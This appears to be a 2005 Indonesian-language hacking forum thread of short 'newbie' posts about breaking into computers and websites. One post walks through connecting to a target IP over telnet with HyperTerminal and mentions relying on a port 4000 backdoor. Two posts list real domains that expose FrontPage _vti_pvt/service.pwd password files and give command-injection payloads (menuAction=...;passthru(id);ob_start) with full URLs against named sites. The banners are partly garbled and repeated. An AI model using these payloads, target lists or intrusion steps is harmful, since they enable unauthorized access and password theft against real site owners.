http://enviede.wistee-heb.fr/index.php?cat=poc slythers_at_gmail.com http://seclists.org/lists/fulldisclosure/2005/Nov/0528.html

Post by : telo on [ 25 November 2005 11:07:55 ]

Remote Client
IP warnet kemungkinan kecil utk bisa di remote. Cari IP target (whois) di Dalnet canel Jakarta, biasa nya mrk pake PC sendiri.

Klik tab Start di kiri bawah All program trus pilih Accesories trus pilih Communication lalu pilih HyperTerminal Keluar connect dan dialnya <-- tekan tab Esc di keyboard Muncul kolom HyperTerminalnya trus klik tab File, pilih New Connection Name : cutkeke Trus klik tab OK Hot adress : IP TARGET Port number : 23 Connect using : TCP/IP (Winsock) Trus klik tab OK Kalo masuk muncul login, gunakan kreatifitas kamu utk meremote client. Catatan : Cara ini telah di coba di Windows XP.

Post by : J4mbi H4ck3r on [ 22 November 2005 11:45:27 ]

Reply no: 1 Tambahan : Port number nya jgn hanya berpatokan pada port 23. Carilah port yg terbuka pada IP target (gunakan Scanner). Utk Remote Web bisa juga di gunakan, tinggal masukin aja IP server web nya dan port yg terbuka Catatan : Utk Remote Web musti ada backdoor (port 4000) di web target.

Reply by : J4mbi H4ck3r on [ 22 November 2005 14:00:27 ]

vti_pvt service.pwd
####################################################################### # # Indonesian Newbie Class ( Papers ) # proxy grabber # By iDiots http://idiots.madpage.com # # idiots@linuxmail.org # ####################################################################### # MenuAction= ####################################################################### # # Thank¢¥s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz # Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau

ngangkat gw anak..) # ####################################################################### --------------------------- scriptzzz --------------------------------------------

Key: _vti_pvt/service.pwd ( anggap aja gini )

Ex Bug :

Servis passwd kesalahan nya dia ngasi file yg bisa buat user nobody ngeliat

Ga tau apa nama bug na yg jelas Vurl web na.. males crita banyak.... liat aja web neh web yg bisa di kerjain..

contoh na:

www.pharmacy.ubc.ca/pharmdprogram/_vti_pvt/service.pwd www.heyerlist.org/garderobe/_vti_pvt/service.pwd www.cisgroup.tv/_vti_pvt/service.pwd www.slis.ua.edu/sac/_vti_pvt/service.pwd

Cat: bukan gw yg nemuin bug na... pokoke org laen selain gw....

--------------------------------

iDiots From Hell http://idiots.Madpage.com idiots@linuxmail.org --------------------------------

Post by : iDiots on [ 21 November 2005 21:40:11 ]

MenuAction Bug
####################################################################### # # Indonesian Newbie Class ( Papers ) # proxy grabber # By iDiots http://idiots.madpage.com # # idiots@linuxmail.org # ####################################################################### # MenuAction= ####################################################################### # # Thank¢¥s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz # Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau ngangkat gw anak..) # #######################################################################

--------------------------- scriptzzz --------------------------------------------

Key: MenuAction=

Ex Bug :

menuAction=ccEnter.Show;passthru(id);ob_start menuAction=htmlMyDCL.show;passthru(pwd);ob_start menuAction=htmlEtMenu.ShowCheckupItself;passthru(ls);ob_start Ga tau apa nama bug na yg jelas Vurl web na.. males crita banyak.... liat aja web neh web yg bisa di kerjain..

contoh na:

http://etest.ipbr.ru/design/dataplace/extensions/rips/index1.php?menuAction=ccEnter.Show;passt hru(id);ob_start

http://www.inehnutelnosti.sk/in/main.php?menuAction=htmlMyDCL.show;passthru(pwd);ob_start http://www.ipbr.ru/dataplace/index.php?menuAction=htmlEtMenu.ShowCheckupItself;passthru(ls); ob_start

Cat: bukan gw yg nemuin bug na... pokoke org laen selain gw....

-------------------------------iDiots From Hell http://idiots.Madpage.com idiots@linuxmail.org --------------------------------

Post by : iDiots on [ 21 November 2005 21:37:30 ]